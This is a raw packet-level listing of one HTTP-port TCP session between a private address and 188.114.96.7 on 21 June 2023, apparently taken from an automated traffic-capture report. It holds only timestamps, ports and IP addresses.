Jun 21, 2023 04:27:46.096555948 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096586943 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096618891 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096626997 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.096649885 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096676111 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.096681118 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096713066 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096740007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096770048 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096797943 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.096836090 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096883059 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096920967 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096951008 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096982002 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096982002 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.097016096 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097043037 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.097048044 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097080946 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097110987 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.097126007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097161055 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097193003 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.097203970 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097235918 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097264051 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.097265005 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097296000 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097321033 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.097326994 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097362995 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097392082 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.097407103 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097440004 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097457886 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.097470999 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097501993 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097532988 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097562075 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.097564936 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097596884 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097598076 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.097630978 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097659111 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097659111 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.097692966 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097723007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097726107 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.097754002 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097784042 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097814083 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097839117 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.097843885 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097876072 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097906113 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.097948074 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.097985983 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098021030 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098027945 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.098052979 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098086119 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098088026 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.098115921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098145962 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098181009 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.098182917 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098212957 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.098227024 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098268032 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098301888 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098332882 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098335981 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.098365068 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.098365068 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098396063 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098428011 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098431110 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.098473072 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098501921 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.098520041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098551989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098579884 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098609924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098634958 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.098640919 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098670959 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098697901 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.098706007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098737001 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098766088 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.098767042 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098798037 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098819017 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098839998 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098869085 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098900080 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098912954 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.098927021 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098956108 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.098979950 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.098988056 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099020958 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099020958 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.099030972 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.099061966 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099102020 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099102974 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.099132061 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099163055 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099180937 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.099194050 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099225044 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099256039 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.099261045 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099308968 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099351883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099387884 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099417925 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099417925 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.099450111 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099482059 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099512100 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099543095 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.099543095 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099586010 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099602938 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.099622965 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099654913 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099684954 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099715948 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099716902 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.099747896 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099749088 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.099777937 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099809885 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099833965 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.099841118 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099869013 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.099872112 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099904060 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099925995 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.099935055 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099966049 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099996090 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.099997044 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.100027084 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100045919 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.100058079 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100090027 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100119114 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100153923 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.100164890 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100198030 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100225925 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.100229979 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100255966 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.100279093 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100323915 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100353956 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100384951 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100393057 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.100408077 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.100416899 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100449085 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100480080 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100511074 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100538969 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.100543022 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100574017 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100604057 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100635052 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100636005 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.100665092 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.100678921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100713968 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100740910 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.100745916 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100770950 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.100775957 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100795984 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.100795984 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.100807905 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100838900 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100869894 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100882053 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.100899935 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100927114 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.100933075 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100963116 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.100992918 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101027012 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101027966 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101054907 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101058006 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101089001 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101119041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101120949 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101150036 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101180077 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101181030 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101217031 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101222038 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101269007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101300001 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101330042 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101336956 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101371050 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101377964 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101408958 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101443052 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101470947 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101473093 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101502895 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101532936 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101533890 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101566076 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101594925 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101623058 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101624966 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101655006 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101656914 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101684093 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101687908 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101711035 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101713896 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101758957 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101784945 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101790905 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101807117 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101830006 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101840019 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101854086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101876020 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101897001 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101897955 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101918936 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101927996 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101939917 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101963043 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.101965904 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.101984978 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102008104 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102015018 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102030993 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102052927 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102075100 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102077961 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102091074 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102097988 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102118969 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102139950 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102149010 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102161884 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102183104 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102186918 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102204084 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102226019 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102236986 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102247953 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102271080 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102282047 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102299929 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102327108 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102327108 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102348089 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102370024 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102376938 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102392912 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102416039 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102446079 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102446079 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102463007 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102474928 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102498055 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102520943 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102530956 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102544069 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102565050 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102587938 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102610111 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102610111 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102619886 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102632999 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102655888 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102677107 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102680922 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102700949 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102705002 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102722883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102744102 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102766037 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102771997 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102787971 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102791071 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102814913 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102844000 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102865934 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102874994 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102886915 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102909088 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102911949 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102931023 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102953911 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102955103 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102976084 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.102981091 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.102998972 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103022099 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103025913 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103043079 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103065014 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103087902 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103090048 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103090048 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103110075 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103111982 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103132010 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103154898 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103177071 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103180885 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103199959 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103203058 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103221893 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103245974 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103249073 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103267908 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103290081 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103297949 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.103312016 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103333950 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.103358030 CEST	80	49709	188.114.96.7	192.168.2.3
